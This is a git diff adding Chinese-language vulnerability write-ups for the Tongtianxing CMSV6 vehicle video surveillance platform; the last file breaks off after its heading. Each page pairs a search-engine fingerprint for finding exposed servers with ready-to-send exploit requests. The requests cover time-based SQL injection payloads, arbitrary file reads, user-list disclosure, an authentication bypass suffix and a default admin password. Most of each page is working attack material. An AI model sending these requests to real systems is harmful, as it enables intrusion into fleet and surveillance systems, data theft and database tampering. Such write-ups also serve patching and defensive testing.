+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=87F04E406314662DEF40451BC5114457
+Connection: close
+
+page=1&rp=15&query=&qtype=&pagin=%257B%2522currentPage%2522%253A1%252C%2522pageRecords%2522%253A15%257D
+```
+
+![1706862603015-66ad1edb-9862-424f-8dd7-5ceef0e610f9.png](./img/TXQxrAkI_D_RFddr/1706862603015-66ad1edb-9862-424f-8dd7-5ceef0e610f9-748844.png)
+
+
+
+> 更新: 2024-12-28 13:05:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xfqhkpt5end64g2q>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台StandardApiAction_findCompanyList存在信息泄露漏洞.md b/通天星CMSV6车载视频监控平台StandardApiAction_findCompanyList存在信息泄露漏洞.md
new file mode 100644
index 0000000..c60990f
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台StandardApiAction_findCompanyList存在信息泄露漏洞.md
@@ -0,0 +1,25 @@
+# 通天星CMSV6车载视频监控平台 StandardApiAction_findCompanyList存在信息泄露漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台StandardApiAction_findCompanyList存在信息泄露漏洞
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/GQkoOthvOMVbREfc/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-215897.png)
+
+# 四、漏洞复现
+```plain
+/StandardApiAction_findCompanyList.action
+```
+
+![1706970512382-ec095a83-9453-42a2-9e8c-8e93eb7525bf.png](./img/GQkoOthvOMVbREfc/1706970512382-ec095a83-9453-42a2-9e8c-8e93eb7525bf-011750.png)
+
+
+
+> 更新: 2024-12-28 13:05:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gsl14di27m85usc0>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS存在SQL注入漏洞.md
new file mode 100644
index 0000000..e8af1ca
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS存在SQL注入漏洞.md
@@ -0,0 +1,40 @@
+# 通天星CMSV6车载视频监控平台 StandardApiAction_vehicleTTS存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/cz217sMk_C1P0rEd/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-644770.png)
+
+# 四、漏洞复现
+```plain
+GET /StandardApiAction_vehicleTTS.action?DevIDNO=1&Text=x&jsession=2C0EB587191F68C441F128919862AC11%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(3)))DpjE)--%20gtMe HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=8D45F4B70B77ED88CCD43B3050A2934F
+Connection: close
+```
+
+![1706887910425-9c6df7cf-28b3-403c-a048-e666ce8cf4af.png](./img/cz217sMk_C1P0rEd/1706887910425-9c6df7cf-28b3-403c-a048-e666ce8cf4af-848983.png)
+
+```plain
+/StandardApiAction_vehicleTTS.action?DevIDNO=1&Text=x&jsession=2C0EB587191F68C441F128919862AC11
+```
+
+![1706888743695-736d4eba-5807-4067-ab5b-db94423a9e94.png](./img/cz217sMk_C1P0rEd/1706888743695-736d4eba-5807-4067-ab5b-db94423a9e94-050317.png)
+
+
+
+> 更新: 2024-12-28 13:05:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dm6snum2k0g80c2g>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台StandardLoginAction_getAllUser存在信息泄露漏洞.md b/通天星CMSV6车载视频监控平台StandardLoginAction_getAllUser存在信息泄露漏洞.md
new file mode 100644
index 0000000..30763fd
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台StandardLoginAction_getAllUser存在信息泄露漏洞.md
@@ -0,0 +1,35 @@
+# 通天星CMSV6车载视频监控平台 StandardLoginAction_getAllUser存在信息泄露漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台 StandardLoginAction_getAllUser存在信息泄露漏洞
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/qeBqs1a9Qk8ZCyGE/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-679029.png)
+
+# 四、漏洞复现
+```plain
+POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-type: application/x-www-form-urlencoded
+Content-Length: 9
+Connection: close
+
+json=null
+```
+
+![1708930197713-09611dea-bacf-4aef-9cb2-852e43d9b0d6.png](./img/qeBqs1a9Qk8ZCyGE/1708930197713-09611dea-bacf-4aef-9cb2-852e43d9b0d6-824541.png)
+
+![1708930228198-70bb271e-273a-4e3f-aea0-43c58e85a92d.png](./img/qeBqs1a9Qk8ZCyGE/1708930228198-70bb271e-273a-4e3f-aea0-43c58e85a92d-631853.png)
+
+
+
+> 更新: 2024-12-28 13:05:36  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xuidr5l1k7z3iin7>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台StandardReportMediaAction_getImage存在任意文件读取漏洞.md b/通天星CMSV6车载视频监控平台StandardReportMediaAction_getImage存在任意文件读取漏洞.md
new file mode 100644
index 0000000..27474fe
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台StandardReportMediaAction_getImage存在任意文件读取漏洞.md
@@ -0,0 +1,33 @@
+# 通天星CMSV6车载视频监控平台 StandardReportMediaAction_getImage存在任意文件读取漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台 StandardReportMediaAction_getImage存在信息泄露漏洞。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/Qz7AF5mVWHbgfj7L/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-213540.png)
+
+# 四、漏洞复现
+```plain
+GET /808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=82D471F9BEF54995F73170C5647FAF54
+Upgrade-Insecure-Requests: 1
+```
+
+![1708916552974-e0e3aa2a-cfee-488d-9cff-878b9b5c550f.png](./img/Qz7AF5mVWHbgfj7L/1708916552974-e0e3aa2a-cfee-488d-9cff-878b9b5c550f-986675.png)[通天星-CMSV6-standardreportmediaaction-getimage-文件读取.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1735362336433-896c3fbf-7ba6-4420-8882-397fee7aa98b.yaml)
+
+
+
+> 更新: 2024-12-28 13:05:36  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bt8a7sowdhsh0dc6>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台complex存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台complex存在SQL注入漏洞.md
new file mode 100644
index 0000000..fe8404a
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台complex存在SQL注入漏洞.md
@@ -0,0 +1,49 @@
+# 通天星CMSV6车载视频监控平台 complex存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台complex存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/vcXGl3_yX1OjLlX9/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-913587.png)
+
+# 四、漏洞复现
+```rust
+POST /dynamic_monitoring_ledger/complex;downloadLogger.action HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 5
+
+statisticTime=1%27+AND+%28SELECT+8849+FROM+%28SELECT%28SLEEP%285%29%29%29uSno%29+AND+%27OOJG%27%3D%27OOJG&contentMeasures=1&companyId=1
+```
+
+![1717267316081-a29c4ffc-20c3-43e8-a615-d1f33ea97d0b.png](./img/vcXGl3_yX1OjLlX9/1717267316081-a29c4ffc-20c3-43e8-a615-d1f33ea97d0b-006819.png)
+
+```rust
+POST /dynamic_monitoring_ledger/complex;downloadLogger.action HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 5
+
+statisticTime=1&contentMeasures=1&companyId=1
+```
+
+![1717267338409-027e747b-c9ec-475a-9d03-b3903e0b0b5e.png](./img/vcXGl3_yX1OjLlX9/1717267338409-027e747b-c9ec-475a-9d03-b3903e0b0b5e-870824.png)
+
+
+
+> 更新: 2024-12-28 13:05:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kbchfugrz8x9yrew>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台disable存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台disable存在SQL注入漏洞.md
new file mode 100644
index 0000000..66e92c1
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台disable存在SQL注入漏洞.md
@@ -0,0 +1,41 @@
+# 通天星CMSV6车载视频监控平台 disable存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台disable存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/SOwkwqowLJh9AbQ0/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-030024.png)
+
+# 四、漏洞复现
+```rust
+GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+```
+
+![1717265746631-43d0a11b-a656-4117-93fa-af88370c0cf8.png](./img/SOwkwqowLJh9AbQ0/1717265746631-43d0a11b-a656-4117-93fa-af88370c0cf8-182905.png)
+
+```rust
+GET /edu_security_officer/disable;downloadLogger.action?ids=1 HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+```
+
+![1717265761114-f1ef9a5c-996b-41d4-8ebf-4a5620210973.png](./img/SOwkwqowLJh9AbQ0/1717265761114-f1ef9a5c-996b-41d4-8ebf-4a5620210973-835467.png)
+
+
+
+> 更新: 2024-12-28 13:05:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cmzasmro4p4gdshs>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台dismiss_disable存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台dismiss_disable存在SQL注入漏洞.md
new file mode 100644
index 0000000..7bcbe90
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台dismiss_disable存在SQL注入漏洞.md
@@ -0,0 +1,41 @@
+# 通天星CMSV6车载视频监控平台 dismiss_disable存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台dismiss_disable存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/RD1frkQj3EIWkVmf/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-909326.png)
+
+# 四、漏洞复现
+```rust
+GET /edu_security_officer/dismiss_disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+```
+
+![1717265859414-4b868741-d8fe-46ff-b4d9-c0df4e83e0b0.png](./img/RD1frkQj3EIWkVmf/1717265859414-4b868741-d8fe-46ff-b4d9-c0df4e83e0b0-924563.png)
+
+```rust
+GET /edu_security_officer/dismiss_disable;downloadLogger.action?ids= HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+```
+
+![1717265872402-6e02a4d2-5185-44c1-b57c-3a3446189c6c.png](./img/RD1frkQj3EIWkVmf/1717265872402-6e02a4d2-5185-44c1-b57c-3a3446189c6c-792294.png)
+
+
+
+> 更新: 2024-12-28 13:05:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vrhper615hgdecv6>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台downloadLogger任意文件下载.md b/通天星CMSV6车载视频监控平台downloadLogger任意文件下载.md
new file mode 100644
index 0000000..17a5b22
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台downloadLogger任意文件下载.md
@@ -0,0 +1,37 @@
+# 通天星CMSV6车载视频监控平台  downloadLogger任意文件下载
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台存在任意文件下载漏洞，攻击者可通过此漏洞下载敏感文件信息，获取数据库账号密码，从而为下一步攻击做准备。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/X3Ip5GtyEvMvrLCS/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-243948.png)
+
+# 四、漏洞复现
+```plain
+POST /808gps/logger/downloadLogger.action HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Upgrade-Insecure-Requests: 1
+sec-ch-ua-platform: "Windows"
+sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not=A?Brand";v="24"
+sec-ch-ua-mobile: ?0
+Content-Type: application/x-www-form-urlencoded
+
+fileName=C:\windows\win.ini
+```
+
+![1700148030526-73b31a17-3065-420a-ba37-b0399d1f568a.png](./img/X3Ip5GtyEvMvrLCS/1700148030526-73b31a17-3065-420a-ba37-b0399d1f568a-272668.png)
+
+
+
+> 更新: 2024-12-28 13:05:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cvnplow5gdgbsaka>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台druid存在默认口令漏洞.md b/通天星CMSV6车载视频监控平台druid存在默认口令漏洞.md
new file mode 100644
index 0000000..777710e
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台druid存在默认口令漏洞.md
@@ -0,0 +1,41 @@
+# 通天星CMSV6车载视频监控平台 druid存在默认口令漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台 druid存在默认口令漏洞。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/99EBhY1oQ-mjYZgI/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-754278.png)
+
+# 四、漏洞复现
+`;downloadLogger.action`绕过鉴权
+
+```plain
+POST /druid/submitLogin HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: text/plain, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 42
+Connection: close
+Cookie: JSESSIONID=4F7D8A071EAC19E6196D1775D84D2F8D
+
+loginUsername=ttx&loginPassword=ttx123456.
+```
+
+![1711464615359-a39000d2-d25e-428f-8c8d-70b3f0cea36a.png](./img/99EBhY1oQ-mjYZgI/1711464615359-a39000d2-d25e-428f-8c8d-70b3f0cea36a-366787.png)
+
+![1711464632801-68cfb113-488a-48b1-8233-3f588fd8d554.png](./img/99EBhY1oQ-mjYZgI/1711464632801-68cfb113-488a-48b1-8233-3f588fd8d554-615129.png)
+
+
+
+> 更新: 2024-12-28 13:05:36  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/agnzkrfsf9am4t8p>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台edu_class_delete存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台edu_class_delete存在SQL注入漏洞.md
new file mode 100644
index 0000000..4169476
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台edu_class_delete存在SQL注入漏洞.md
@@ -0,0 +1,44 @@
+# 通天星CMSV6车载视频监控平台 edu_class/delete存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台edu_class/delete存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/ZfRbEUS-yZR57cAu/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-994080.png)
+
+# 四、漏洞复现
+```java
+GET /edu_class/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: JSESSIONID=58586A7CBD64C381945F9AAACFDF7C40
+Connection: close
+Content-Length: 0
+```
+
+![1712849698475-ee1f69ae-46f8-4eda-ba76-646d4b41515c.png](./img/ZfRbEUS-yZR57cAu/1712849698475-ee1f69ae-46f8-4eda-ba76-646d4b41515c-605340.png)
+
+sqlmap
+
+```java
+/edu_class/delete.do;downloadLogger.action?ids=1)&loadAll=1
+```
+
+![1712849859585-314f1ccf-6a3b-4b2e-9b37-c85b79daf608.png](./img/ZfRbEUS-yZR57cAu/1712849859585-314f1ccf-6a3b-4b2e-9b37-c85b79daf608-134757.png)
+
+
+
+> 更新: 2024-12-28 13:05:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lliesn3xxqds6alt>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台edu_course_publish_revoke存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台edu_course_publish_revoke存在SQL注入漏洞.md
new file mode 100644
index 0000000..63d6f18
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台edu_course_publish_revoke存在SQL注入漏洞.md
@@ -0,0 +1,44 @@
+# 通天星CMSV6车载视频监控平台 edu_course/publish_revoke存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台edu_course/publish_revoke存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/LzwGPnC6BmZGEgDF/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-051441.png)
+
+# 四、漏洞复现
+```java
+GET /edu_course/publish_revoke;downloadLogger.action?id=(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&value=1 HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: JSESSIONID=58586A7CBD64C381945F9AAACFDF7C40
+Connection: close
+Content-Length: 0
+```
+
+![1712850115886-4c901b40-1d44-4be6-b87f-d1fe32e3a315.png](./img/LzwGPnC6BmZGEgDF/1712850115886-4c901b40-1d44-4be6-b87f-d1fe32e3a315-422299.png)
+
+sqlmap
+
+```java
+/edu_course/publish_revoke;downloadLogger.action?id=1&value=1
+```
+
+![1712850269122-4dff0f16-01db-4ca5-9347-1a08da7752b8.png](./img/LzwGPnC6BmZGEgDF/1712850269122-4dff0f16-01db-4ca5-9347-1a08da7752b8-990604.png)
+
+
+
+> 更新: 2024-12-28 13:05:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dv0sw9puz54vfp6b>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台edu_plan_publish_revoke存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台edu_plan_publish_revoke存在SQL注入漏洞.md
new file mode 100644
index 0000000..b7c6e63
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台edu_plan_publish_revoke存在SQL注入漏洞.md
@@ -0,0 +1,44 @@
+# 通天星CMSV6车载视频监控平台 edu_plan/publish_revoke存在SQL注入漏洞
+
+# 一、漏洞简介
